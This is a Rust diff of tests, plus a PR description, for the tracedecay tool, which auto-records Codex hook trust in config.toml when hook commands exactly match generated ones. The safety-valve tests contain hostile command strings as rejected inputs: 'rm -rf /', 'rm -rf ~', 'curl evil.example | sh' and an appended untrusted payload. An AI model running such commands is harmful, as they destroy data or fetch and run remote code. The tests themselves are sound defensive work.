+    let changed_entries =
+        codex_hook_trust_entries_for_marketplace(&hooks, "my-marketplace").unwrap();
+    std::fs::create_dir_all(home.path().join(".codex")).unwrap();
+
+    sync_codex_hook_trust(home.path(), TEST_BIN).unwrap();
+
+    let config = load_toml_file(&codex_config_path(home.path())).unwrap();
+    assert_eq!(
+        codex_plugin_hook_trust_state(&config, &changed_entries),
+        CodexHookTrustState::Trusted
+    );
+}
+
+#[test]
+fn sync_codex_hook_trust_rejects_tampered_installed_command() {
+    let home = tempfile::tempdir().expect("tempdir");
+    let plugin_dir = install_codex_personal_bootstrap(home.path(), TEST_BIN).unwrap();
+    let hooks_path = plugin_dir.join("hooks/hooks.json");
+    let mut hooks = load_json_file_strict(&hooks_path).unwrap();
+    let command = hooks["hooks"]["SessionStart"][0]["hooks"][0]["command"]
+        .as_str()
+        .unwrap()
+        .to_string();
+    hooks["hooks"]["SessionStart"][0]["hooks"][0]["command"] =
+        json!(format!("{command} && /tmp/untrusted-payload"));
+    safe_write_json_file(&hooks_path, &hooks, None).unwrap();
+    std::fs::create_dir_all(home.path().join(".codex")).unwrap();
+
+    let outcome = sync_codex_hook_trust(home.path(), TEST_BIN).unwrap();
+
+    assert_eq!(outcome.trusted, CODEX_MANAGED_HOOKS.len() - 1);
+    assert_eq!(outcome.skipped, vec!["session_start".to_string()]);
+    let config = load_toml_file(&codex_config_path(home.path())).unwrap();
+    let state = config["hooks"]["state"].as_table().unwrap();
+    assert!(!state.keys().any(|key| key.ends_with(":session_start:0:0")));
+}
+
+#[test]
+fn codex_hook_command_invokes_tracedecay_is_a_safety_valve() {
+    // A hook that actually invokes the tracedecay binary is trustable. Build
+    // the command through the same hook_command helper the generator uses so
+    // the assertion holds under each platform's quoting (single quotes on
+    // Unix, different quoting on Windows).
+    assert!(codex_hook_command_invokes_tracedecay(
+        &crate::agents::hook_command(TEST_BIN, "hook-codex-session-start"),
+        TEST_BIN
+    ));
+    // Every managed subcommand's exact generated command is trustable.
+    for hook in CODEX_MANAGED_HOOKS {
+        assert!(
+            codex_hook_command_invokes_tracedecay(
+                &crate::agents::hook_command(TEST_BIN, hook.subcommand),
+                TEST_BIN
+            ),
+            "generated command for {} should be trusted",
+            hook.subcommand
+        );
+    }
+    // A hook that does not invoke the tracedecay binary is never auto-trusted.
+    assert!(!codex_hook_command_invokes_tracedecay(
+        "/usr/bin/rm -rf /",
+        TEST_BIN
+    ));
+    assert!(!codex_hook_command_invokes_tracedecay(
+        &crate::agents::hook_command("/somewhere/else/tracedecay", "hook-codex-session-start"),
+        TEST_BIN
+    ));
+    // Suffix injection: a command that starts with our binary token but appends
+    // an arbitrary payload must be rejected (a prefix check would have trusted
+    // it). Also reject an unknown subcommand and a prefix-only fragment.
+    let base = crate::agents::hook_command(TEST_BIN, "hook-codex-session-start");
+    assert!(!codex_hook_command_invokes_tracedecay(
+        &format!("{base} && rm -rf ~"),
+        TEST_BIN
+    ));
+    assert!(!codex_hook_command_invokes_tracedecay(
+        &format!("{base}; curl evil.example | sh"),
+        TEST_BIN
+    ));
+    assert!(!codex_hook_command_invokes_tracedecay(
+        &crate::agents::hook_command(TEST_BIN, "hook-codex-not-a-real-subcommand"),
+        TEST_BIN
+    ));
+    assert!(!codex_hook_command_invokes_tracedecay(
+        &crate::agents::hook_command(TEST_BIN, ""),
+        TEST_BIN
+    ));
+}
+
+/// The install-output follow-up must stand until explicit, current trust is
+/// recorded for every managed hook (normally by the auto-trust sync, or by
+/// `/hooks` when the safety valve skipped a hook) — and clear the moment it is.
 #[test]
 fn codex_hook_trust_followup_clears_only_after_explicit_current_trust() {
     let home = tempfile::tempdir().expect("tempdir");
@@ -769,10 +1057,84 @@ fn codex_preflight_reports_inactive_cache_without_interactive_guidance() {
 #[test]
 fn prepare_stages_the_source_and_returns_ready_for_cli_activation() {
     let home = tempfile::tempdir().unwrap();
+    // Pre-existing user config the install-path trust write must preserve.
+    let config_path = codex_config_path(home.path());
+    std::fs::create_dir_all(config_path.parent().unwrap()).unwrap();
+    std::fs::write(&config_path, "model = \"gpt-5\"\n").unwrap();
+
     let outcome = CodexIntegration
         .prepare_non_interactive_install(&install_ctx(home.path()))
         .unwrap();
     assert!(matches!(outcome, NonInteractiveInstallOutcome::Ready));
     assert!(codex_plugin_manifest_path(home.path()).is_file());
     assert!(codex_personal_marketplace_path(home.path()).is_file());
+
+    // Install auto-trusts the staged managed hooks in config.toml while
+    // leaving the user's unrelated keys intact.
+    let config = load_toml_file(&config_path).unwrap();
+    assert_eq!(config["model"].as_str().unwrap(), "gpt-5");
+    assert!(
+        config["hooks"]["state"]
+            .as_table()
+            .unwrap()
+            .keys()
+            .any(|key| key.starts_with("tracedecay@personal:hooks/hooks.json:")),
+        "install should record tracedecay hook trust entries"
+    );
+    assert!(
+        std::fs::read_to_string(&config_path)
+            .unwrap()
+            .lines()
+            .any(|line| line == "[hooks.state]"),
+        "install should write the explicit [hooks.state] parent table"
+    );
+}
+
+#[test]
+fn codex_update_plugin_refreshes_bundle_and_records_hook_trust() {
+    let home = tempfile::tempdir().unwrap();
+    write_exact_native_activation(home.path(), TEST_BIN);
+    // Re-seed config.toml with the native activation record plus an unrelated
+    // user key the trust write must preserve.
+    let config_path = codex_config_path(home.path());
+    std::fs::write(
+        &config_path,
+        "model = \"gpt-5\"\n\n[plugins.\"tracedecay@personal\"]\nenabled = true\n",
+    )
+    .unwrap();
+    let project_root = home.path().join("workspace");
+    let ctx = InstallContext {
+        project_root: Some(project_root),
+        ..install_ctx(home.path())
+    };
+
+    let outcome = CodexIntegration.update_plugin(&ctx).unwrap();
+    let UpdatePluginOutcome::Refreshed(paths) = outcome else {
+        panic!("expected codex update_plugin to refresh the bundle");
+    };
+    assert_eq!(paths, vec![codex_plugin_install_dir(home.path())]);
+
+    // update-plugin auto-trusts the refreshed hooks by recording their content
+    // hashes in config.toml, while leaving the user's unrelated keys intact.
+    let updated = load_toml_file(&config_path).unwrap();
+    assert_eq!(updated["model"].as_str().unwrap(), "gpt-5");
+    assert_eq!(
+        updated["plugins"]["tracedecay@personal"]["enabled"].as_bool(),
+        Some(true),
+        "update-plugin must preserve Codex's own activation record"
+    );
+    assert!(
+        updated["hooks"]["state"]
+            .as_table()
+            .unwrap()
+            .keys()
+            .any(|key| key.starts_with("tracedecay@personal:hooks/hooks.json:")),
+        "update-plugin should record tracedecay hook trust entries"
+    );
+    let entries = managed_entries(TEST_BIN);
+    assert_eq!(
+        codex_plugin_hook_trust_state(&updated, &entries),
+        CodexHookTrustState::Trusted
+    );
+    assert_eq!(codex_hook_trust_followup(home.path()), None);
 }

--- a/crates/tracedecay-agent-hosts/src/agents/codex/tests.rs
+++ b/crates/tracedecay-agent-hosts/src/agents/codex/tests.rs
@@ -309,6 +309,17 @@ trusted_hash = "sha256:foreign"
                 & 0o777,
             0o600
         );
+        // The backup carries the same secrets as the original, so it must
+        // inherit the restrictive mode instead of the umask default.
+        assert_eq!(
+            std::fs::metadata(crate::agents::config_backup_path(&config_path))
+                .unwrap()
+                .permissions()
+                .mode()
+                & 0o777,
+            0o600,
+            "config.toml.bak must keep the original 0600 mode"
+        );
     }
 
     let config_text = std::fs::read_to_string(&config_path).unwrap();
@@ -1057,7 +1068,9 @@ fn codex_preflight_reports_inactive_cache_without_interactive_guidance() {
 #[test]
 fn prepare_stages_the_source_and_returns_ready_for_cli_activation() {
     let home = tempfile::tempdir().unwrap();
-    // Pre-existing user config the install-path trust write must preserve.
+    // Pre-existing user config: preparation runs before the component
+    // transaction stages `config.toml`, so it must not write there — hook
+    // trust is recorded by activation, inside the rollback boundary.
     let config_path = codex_config_path(home.path());
     std::fs::create_dir_all(config_path.parent().unwrap()).unwrap();
     std::fs::write(&config_path, "model = \"gpt-5\"\n").unwrap();
@@ -1068,26 +1081,114 @@ fn prepare_stages_the_source_and_returns_ready_for_cli_activation() {
     assert!(matches!(outcome, NonInteractiveInstallOutcome::Ready));
     assert!(codex_plugin_manifest_path(home.path()).is_file());
     assert!(codex_personal_marketplace_path(home.path()).is_file());
+    assert_eq!(
+        std::fs::read_to_string(&config_path).unwrap(),
+        "model = \"gpt-5\"\n",
+        "preparation must leave config.toml untouched"
+    );
+}
 
-    // Install auto-trusts the staged managed hooks in config.toml while
-    // leaving the user's unrelated keys intact.
-    let config = load_toml_file(&config_path).unwrap();
-    assert_eq!(config["model"].as_str().unwrap(), "gpt-5");
-    assert!(
-        config["hooks"]["state"]
-            .as_table()
-            .unwrap()
-            .keys()
-            .any(|key| key.starts_with("tracedecay@personal:hooks/hooks.json:")),
-        "install should record tracedecay hook trust entries"
+/// Activation must record hook trust even when Codex already reports the
+/// plugin natively active (no `codex plugin add` run): an already-current
+/// install can still carry missing or stale trust, and the canonical
+/// install/update/repair transaction reaches this method for both cases.
+#[test]
+fn activation_records_hook_trust_for_already_active_install() {
+    let home = tempfile::tempdir().unwrap();
+    write_exact_native_activation(home.path(), TEST_BIN);
+    let config_path = codex_config_path(home.path());
+    std::fs::write(
+        &config_path,
+        "model = \"gpt-5\"\n\n[plugins.\"tracedecay@personal\"]\nenabled = true\n",
+    )
+    .unwrap();
+
+    CodexIntegration
+        .activate_deployed_host_registration(&install_ctx(home.path()))
+        .unwrap();
+
+    let updated = load_toml_file(&config_path).unwrap();
+    assert_eq!(updated["model"].as_str().unwrap(), "gpt-5");
+    assert_eq!(
+        updated["plugins"]["tracedecay@personal"]["enabled"].as_bool(),
+        Some(true)
+    );
+    let entries = managed_entries(TEST_BIN);
+    assert_eq!(
+        codex_plugin_hook_trust_state(&updated, &entries),
+        CodexHookTrustState::Trusted
+    );
+    assert_eq!(codex_hook_trust_followup(home.path()), None);
+}
+
+/// Uninstall must not leave the managed trust records behind: they count as
+/// registration residue and would hold the post-uninstall registration state
+/// at Repairable instead of Missing. Foreign plugins' records and unrelated
+/// user config stay untouched.
+#[test]
+fn deactivation_prunes_managed_hook_trust_and_preserves_foreign_records() {
+    let home = tempfile::tempdir().unwrap();
+    install_codex_personal_bootstrap(home.path(), TEST_BIN).unwrap();
+    let config_path = codex_config_path(home.path());
+    std::fs::create_dir_all(config_path.parent().unwrap()).unwrap();
+    std::fs::write(
+        &config_path,
+        r#"model = "gpt-5"
+
+[hooks.state."other@plugin:hooks/hooks.json:session_start:0:0"]
+trusted_hash = "sha256:foreign"
+"#,
+    )
+    .unwrap();
+    sync_codex_hook_trust(home.path(), TEST_BIN).unwrap();
+    let seeded = load_toml_file(&config_path).unwrap();
+    assert_eq!(
+        seeded["hooks"]["state"].as_table().unwrap().len(),
+        CODEX_MANAGED_HOOKS.len() + 1
+    );
+
+    // No activation record and no current cache: deactivation takes the
+    // no-CLI branch and must still prune the managed trust records.
+    CodexIntegration
+        .deactivate_deployed_host_registration(&install_ctx(home.path()))
+        .unwrap();
+
+    let pruned = load_toml_file(&config_path).unwrap();
+    assert_eq!(pruned["model"].as_str().unwrap(), "gpt-5");
+    let state = pruned["hooks"]["state"].as_table().unwrap();
+    assert_eq!(
+        state.keys().collect::<Vec<_>>(),
+        vec!["other@plugin:hooks/hooks.json:session_start:0:0"],
+        "only the foreign record survives deactivation"
     );
     assert!(
         std::fs::read_to_string(&config_path)
             .unwrap()
             .lines()
             .any(|line| line == "[hooks.state]"),
-        "install should write the explicit [hooks.state] parent table"
+        "surviving foreign records keep the explicit [hooks.state] table"
     );
+
+    // With no foreign records the emptied hooks tables disappear entirely and
+    // the hook-trust residue is gone.
+    std::fs::write(&config_path, "model = \"gpt-5\"\n").unwrap();
+    sync_codex_hook_trust(home.path(), TEST_BIN).unwrap();
+    CodexIntegration
+        .deactivate_deployed_host_registration(&install_ctx(home.path()))
+        .unwrap();
+    let cleaned = load_toml_file(&config_path).unwrap();
+    assert_eq!(cleaned["model"].as_str().unwrap(), "gpt-5");
+    assert!(
+        cleaned.get("hooks").is_none(),
+        "an emptied [hooks] tree is dropped rather than left hollow"
+    );
+
+    // Idempotent: pruning with nothing to prune leaves the file byte-stable.
+    let before = std::fs::read(&config_path).unwrap();
+    CodexIntegration
+        .deactivate_deployed_host_registration(&install_ctx(home.path()))
+        .unwrap();
+    assert_eq!(std::fs::read(&config_path).unwrap(), before);
 }
 
 #[test]

--- a/crates/tracedecay-agent-hosts/src/agents/mod.rs
+++ b/crates/tracedecay-agent-hosts/src/agents/mod.rs
@@ -821,6 +821,26 @@ pub fn backup_config_file(path: &Path) -> Result<Option<PathBuf>> {
             ),
         }
     })?;
+    // The backup holds the same secrets as the original (host configs can
+    // carry credential env values), so it must not be published with the
+    // umask-default mode: copy the original's permission identity onto the
+    // staging file before it becomes `.bak`.
+    let original_metadata =
+        capture_host_file_metadata(path).map_err(|error| TraceDecayError::Config {
+            message: format!(
+                "failed to capture metadata for {} before backup: {error}",
+                path.display()
+            ),
+        })?;
+    restore_host_file_metadata(&staging_path, &original_metadata).map_err(|error| {
+        std::fs::remove_file(&staging_path).ok();
+        TraceDecayError::Config {
+            message: format!(
+                "failed to apply original permissions to backup staging file {}: {error}",
+                staging_path.display()
+            ),
+        }
+    })?;
     let backup_metadata =
         capture_host_file_metadata(&staging_path).map_err(|error| TraceDecayError::Config {
             message: format!(


### PR DESCRIPTION
<!-- CURSOR_AGENT_PR_BODY_BEGIN -->
Ports the origin/master Codex hook auto-trust write path onto #421 (base `codex/tracedecay-total-redesign-plan`, remounted onto a709de60d / 0.1.0-beta.9), then addresses all four Codex review findings.

## What

`codex plugin add` never writes `[hooks.state]` and `/hooks` is interactive-only, so on this branch freshly installed hooks were silently skipped by Codex until a manual `/hooks` approval. master already solved this by recording trust hashes in `~/.codex/config.toml`; this PR reimplements that write path against #421's architecture.

- **Write path** (`crates/tracedecay-agent-hosts/src/agents/codex.rs`): `sync_codex_hook_trust`, `write_codex_hook_trust_config`, `announce_codex_hook_trust`, `codex_installed_hook_trust_entries`, `codex_runtime_hooks_path`, and the `codex_hook_command_invokes_tracedecay` safety valve, adapted to this branch's `Result`-returning hash helpers (`canonical_sha256`) and its durable write authority (`backup_config_file` + `safe_write_text_file`, preserving permissions and write intents) instead of master's raw `fs::write`.
- **Safety valve**: only hooks whose installed command is byte-for-byte a generated tracedecay command are auto-trusted; tampered/appended payloads are skipped and keep the manual `/hooks` review. Sync prunes stale active/legacy-`personal` entries while preserving foreign plugins' records and all unrelated user config.
- **Wiring (revised per review)**: trust sync lives in `activate_deployed_host_registration` — after a successful `codex plugin add`, and equally for an already-natively-active install. That single point is reached by the canonical component transaction for Install, Update, and Repair (`activate_deployed_host_component_registration` for Core sets) and by the trait `update_plugin`, and it runs inside `with_host_config_write_intents`, so a rejected transaction rolls the trust write back with the rest of `config.toml`.
- **Uninstall symmetry**: `deactivate_deployed_host_registration` prunes the managed `tracedecay@…` `[hooks.state]` records (foreign records preserved, emptied tables dropped), so post-uninstall registration state reaches `Missing` instead of being held `Repairable` by trust residue.
- **Backup hardening** (`agents/mod.rs`): `backup_config_file` now copies the original file's permission identity (mode/readonly/POSIX ACLs) onto the `.bak.new` staging file before publishing `.bak`, so a 0600 Codex config (which can carry credential env values) no longer leaks a umask-default 0644 backup.
- **Doctor followup kept**: `codex_hook_trust_followup` still returns `/hooks` guidance until explicit, current trust exists; it clears after a successful auto-trust and persists when the safety valve skipped a hook or the config was unwritable.
- The `plugin_registry` region guard is untouched — it still refuses a `codex plugin` command that mutates `[hooks]`; TraceDecay's own trust writes run outside any CLI observation window. Module docs updated (they previously stated TraceDecay never writes `config.toml` hook trust).

## Review findings addressed

1. **P1 uninstall residue** — managed trust records now pruned transactionally during deactivation (`prune_codex_hook_trust_records`), covered by `deactivation_prunes_managed_hook_trust_and_preserves_foreign_records`.
2. **P1 backup permissions** — original metadata copied onto the backup staging file; asserted (0600 on `config.toml.bak`) in `sync_codex_hook_trust_records_entries_and_preserves_unrelated_config`.
3. **P2 canonical update path** — verified: `tracedecay update-plugin` skips `update_plugin` for canonical hosts and drives `apply_default_canonical_component_set(Update)`; trust sync moved into `activate_deployed_host_registration`, which that transaction reaches even for already-current installs (covered by `activation_records_hook_trust_for_already_active_install`).
4. **P2 transaction boundary** — trust is no longer written in `prepare_non_interactive_install` (asserted untouched-config in `prepare_stages_the_source_and_returns_ready_for_cli_activation`); it now happens during activation inside the registration transaction's write-intent scope, so failed installs roll it back.

## Tests

All six master sync tests ported (`sync_codex_hook_trust_*`, incl. the tampered-command rejection) plus `codex_hook_command_invokes_tracedecay_is_a_safety_valve`; master's agent_suite update-plugin hook-trust assertion carried as a crate test driving the real `update_plugin` (`codex_update_plugin_refreshes_bundle_and_records_hook_trust`: trust keys recorded, `model = "gpt-5"` and the `[plugins]` activation record preserved). This branch has no `tests/agent_suite` install/update-plugin Codex tests to extend. Existing #421 followup tests kept.

## Verification (on a709de60d)

- `cargo test -p tracedecay-agent-hosts --lib`: 718 passed, 0 failed
- `cargo clippy -p tracedecay-agent-hosts --lib --all-features`: clean
<!-- CURSOR_AGENT_PR_BODY_END -->

<div><a href="https://cursor.com/agents/bc-37012510-f365-4784-a6f0-211218337bb6?cursor_ref=pr_footer&cursor_cta=open_in_web"><picture><source media="(prefers-color-scheme: dark)" srcset="https://cursor.com/assets/images/open-in-web-dark.png"><source media="(prefers-color-scheme: light)" srcset="https://cursor.com/assets/images/open-in-web-light.png"><img alt="Open in Web" width="114" height="28" src="https://cursor.com/assets/images/open-in-web-dark.png"></picture></a>&nbsp;<a href="https://cursor.com/background-agent?bcId=bc-37012510-f365-4784-a6f0-211218337bb6&cursor_ref=pr_footer&cursor_cta=open_in_cursor"><picture><source media="(prefers-color-scheme: dark)" srcset="https://cursor.com/assets/images/open-in-cursor-dark.png"><source media="(prefers-color-scheme: light)" srcset="https://cursor.com/assets/images/open-in-cursor-light.png"><img alt="Open in Cursor" width="131" height="28" src="https://cursor.com/assets/images/open-in-cursor-dark.png"></picture></a>&nbsp;</div>

